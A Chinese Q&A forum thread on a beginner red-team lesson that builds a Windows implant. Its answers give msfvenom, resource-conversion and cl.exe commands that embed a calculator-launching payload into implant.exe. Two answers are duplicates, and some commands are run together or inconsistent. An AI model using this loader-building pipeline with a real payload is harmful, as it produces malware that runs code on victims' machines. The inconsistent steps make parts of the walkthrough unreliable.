10 红队技术:恶意程序开发初级篇1-payload载入点

请先 登录 后评论

最佳答案 2023-09-04 13:11

  1. 使用msfvenom生成payload文件,命令如下:

msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin

其中,windows/x64/exec表示使用64位Windows系统执行命令的payload,CMD=calc.exe表示要执行的命令为打开计算器,-f raw表示输出为二进制文件,-o calc.bin表示输出文件名为calc.bin。

  1. 将payload文件转换为资源文件,命令如下:

bin2res calc.bin calc.rc PAYLOAD

其中,calc.bin为上一步生成的payload文件,calc.rc为输出的资源文件名,PAYLOAD为资源类型。

  1. 将资源文件转换为目标格式,命令如下:

windres calc.rc calc.res

其中,calc.rc为上一步生成的资源文件,calc.res为输出的目标格式文件。

  1. 将目标格式文件链接到源文件中,生成可执行文件,命令如下:

cvtres /MACHINE:x64 /OUT:resources.o calc.res cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tc implant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o

其中,resources.o为第三步生成的目标格式文件,implant.cpp为包含执行payload的源文件,implant.exe为输出的可执行文件。

执行完以上步骤后,就可以得到一个可以打开计算器的payload文件和可执行文件了

请先 登录 后评论

其它 3 个回答

小迪迦
  1. 运行msfvenom,使用以下命令生成计算器的payload文件:

    msfvenom -p windows/x64/exec CMD=calc.exe -f exe -o calc.ico

  2. 将生成的 calc.ico 文件转换成 object 文件。在命令行中输入以下指令:

    cvtres /MACHINE:x64 /OUT:resources.o calc.ico

  3. 接着编译 implant.cpp 源文件,并将 resources.o 文件链接进来,生成可执行文件。在命令行中输入以下指令:

    cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tc implant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o

  4. 最后,运行 implant.exe 文件即可打开计算器

请先 登录 后评论
myfeng
  1. 运行msfvenom,使用以下命令生成计算器的payload文件:

    msfvenom -p windows/x64/exec CMD=calc.exe -f exe -o calc.ico

  2. 将生成的 calc.ico 文件转换成 object 文件。在命令行中输入以下指令:

    cvtres /MACHINE:x64 /OUT:resources.o calc.ico

  3. 接着编译 implant.cpp 源文件,并将 resources.o 文件链接进来,生成可执行文件。在命令行中输入以下指令:

    cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tc implant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o

  4. 最后,运行 implant.exe 文件即可打开计算器

请先 登录 后评论
xigua

试试 msfvenom -p windows/exec CMD=calc.exe -f raw -o calc.ico

请先 登录 后评论
  • 2 关注
  • 0 收藏,14576 浏览
  • DFSS 提出于 2023-04-08 15:59